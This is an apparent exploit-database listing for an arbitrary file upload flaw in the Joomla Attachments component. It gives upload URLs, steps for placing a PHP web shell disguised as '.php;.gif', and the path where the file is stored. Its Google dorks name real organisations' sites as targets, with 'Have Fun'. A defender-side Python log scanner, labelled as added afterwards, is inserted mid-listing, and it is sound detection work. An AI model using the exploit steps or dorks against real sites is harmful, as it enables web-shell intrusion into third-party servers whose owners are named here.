Joomla 3.9.6 Com_Attachments Components 3.x Unauthorized File Insertion

CVE: CVE-2019-10945
Category: CWE-264
Price: $500
Severity: High
Author: Exploit Writer
Risk: High
Exploitation Type: Remote
Date: 2019-05-27
CVSS: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H
EPSS: 0.02192
EPSSP: 0.50148


Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2019050282

Below is a copy:

Joomla 3.9.6 Com_Attachments Components 3.x Unauthorized File Insertion
####################################################################

# Exploit Title : Joomla 3.9.6 Com_Attachments Components 3.x Unauthorized File Insertion
# Author [ Discovered By ] : KingSkrupellos
# Team : Cyberizm Digital Security Army
# Date : 26/05/2019
# Vendor Homepage : jmcameron.net
# Software Download Links : jmcameron.net/attachments/
jmcameron.net/attachments/updates/3.2.6/attachments-3.2.6.zip
joomlacode.org/gf/download/frsrelease/18688/83852/attachments-2.2.2.zip
joomlacode.org/gf/project/attachments/frs/
github.com/sdc/DevonStudioSchool/tree/master/administrator/components/com_attachments/
# Software Information Links : extensions.joomla.org/extension/attachments/
joomlacode.org/gf/project/attachments/
joomlacode.org/gf/project/attachments3/
# Joomla Affected Versions :
Joomla 3.4.8
Joomla 3.5.1
Joomla 3.6.5
Joomla 3.8.1
Joomla 3.8.11
Joomla 3.8.3
Joomla 3.9.6
# Software Affected Versions [ Component Com_Attachments ] : 
2.2.2 and 3.2.6 - 3.x / All previous versions.
# Tested On : Windows and Linux
# Category : WebApps
# Exploit Risk : Medium
# Google Dorks : 
inurl:/index.php?option=com_attachments&task=upload
intext:Copyright (C) 2006-2020 BSA Troop 444. All Rights Reserved.
intext:Treadmill Desk from TrekDesk
intext:Copyright  2015 Ashleigh-D. All rights reserved. Website designed by Mojosync Pty Ltd using Joomla
intext:Fundacin Jesuitas Paraguay
intext: 2019 Mars Society Polska
intext:Designed by atict.com
intext:Copyright  2017. All Rights Reserved.Webaloss - Realizzazione siti webwebaloss.com
intext:Designed by Burosphere.
intext:Conselho Nacional de Recursos Hdricos CNRH Ministerio Do Desenvolvimento Regional
and more on Google and other Search Engines...... Have Fun....
# Vulnerability Type : CWE-264 [ Permissions, Privileges, and Access Controls ]
# PacketStormSecurity : packetstormsecurity.com/files/authors/13968
# CXSecurity : cxsecurity.com/author/KingSkrupellos/1/
# Exploit4Arab : exploit4arab.org/author/351/KingSkrupellos
# Reference Link [ Similar ] : dl.packetstormsecurity.net/1902-exploits/joomlaattachments326-shell.txt

####################################################################

# Description about Software :
***************************
The 'Attachments' extension allows files to be uploaded and attached to content
articles in Joomla. Includes a plugin to display attachments and a component
for uploading and managing attachments.

####################################################################

# Impact :
***********
Joomla Attachments Components 3.x and other previous versions could allow a
remote attacker to upload arbitrary files (including a web shell), caused by the
improper validation of file extensions by multiple scripts reached through
index.php. The issue occurs because the application fails to adequately sanitize
user-supplied input.
Exploiting this issue will allow attackers to execute arbitrary code within
the context of the affected application. This may facilitate unauthorized access
or privilege escalation; other attacks may also be possible.
By sending a specially crafted HTTP request, a remote attacker could exploit
this vulnerability to upload a malicious PHP script, which could allow the
attacker to execute arbitrary PHP code on the vulnerable system.

####################################################################

# Arbitrary File Upload/Unauthorized File Insertion Exploit :
****************************************************
/index.php?option=com_attachments&task=upload&uri=file&parent_id=1&parent_type=com_content&tmpl=component&from=closeme

/index.php?option=com_attachments&task=upload&uri=file&parent_id=[ARTICLE-ID-NUMBER]/&parent_type=com_content&tmpl=component&from=closeme

Click "Select file to upload instead" - Fill the form - Published => "Yes" and click "Public"

Attach file: - Upload your .txt .jpg .gif .png .phtml .php;.gif file to the vulnerable system.

# Directory File Path :
********************
/attachments/article/[ARTICLE-ID-NUMBER]/kingskrupellos.txt
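
A defender-side log check for the request pattern and storage path described above, added here as an example (it is not part of the original advisory or of the Attachments project). It assumes combined-format web access logs; `classify`, `scan` and the sample lines are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Extensions a PHP-enabled server may execute. Matched anywhere in the file
# name, so "x.php;.gif", "x.php.jpg" and "x.phtml" are caught, not only a
# trailing ".php".
EXEC_EXT = re.compile(r"\.(php\d?|phtml|phar|pht)(?=$|[.;\s])", re.I)
# Storage path given in the advisory: /attachments/article/<id>/<file>
STORED = re.compile(r"/attachments/article/(\d+)/([^/?]+)$")
# Request part of a combined-format log line (assumed log format).
LINE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+" (?P<status>\d{3})')

def classify(line):
    """Return (finding, detail) for one access-log line, or None."""
    m = LINE.search(line)
    if not m:
        return None
    url = urlsplit(m["target"])
    query = parse_qs(url.query)
    # Front-end upload task of com_attachments, as shown in the advisory URLs.
    if query.get("option") == ["com_attachments"] and query.get("task") == ["upload"]:
        parent = query.get("parent_id", ["?"])[0]
        return "upload-endpoint", f"{m['method']} parent_id={parent}"
    # Request for a stored attachment whose name carries an executable extension.
    stored = STORED.search(unquote(url.path))
    if stored and EXEC_EXT.search(stored.group(2)):
        return "exec-attachment", stored.group(2)
    return None

def scan(lines):
    """Return (line_number, finding, detail) for every flagged line."""
    return [(n, *hit) for n, line in enumerate(lines, 1) if (hit := classify(line))]

# Constructed sample log lines (documentation addresses, not real traffic).
SAMPLE = [
    '203.0.113.7 - - [27/May/2019:10:01:02 +0000] "GET /index.php?option=com_attachments'
    '&task=upload&uri=file&parent_id=87&parent_type=com_content&tmpl=component'
    '&from=closeme HTTP/1.1" 200 5120',
    '203.0.113.7 - - [27/May/2019:10:02:05 +0000] "GET /attachments/article/87/notes.php%3B.gif HTTP/1.1" 200 17',
    '198.51.100.4 - - [27/May/2019:10:05:00 +0000] "GET /attachments/article/87/minutes.pdf HTTP/1.1" 200 90210',
]

if __name__ == "__main__":
    for finding in scan(SAMPLE):
        print(finding)
```

Hits on `upload-endpoint` from clients without an authenticated session, followed by `exec-attachment` requests for the same article ID, are the sequence to triage first.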

####################################################################

# Example Vulnerable Sites : 
**************************

####################################################################

# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team 

####################################################################
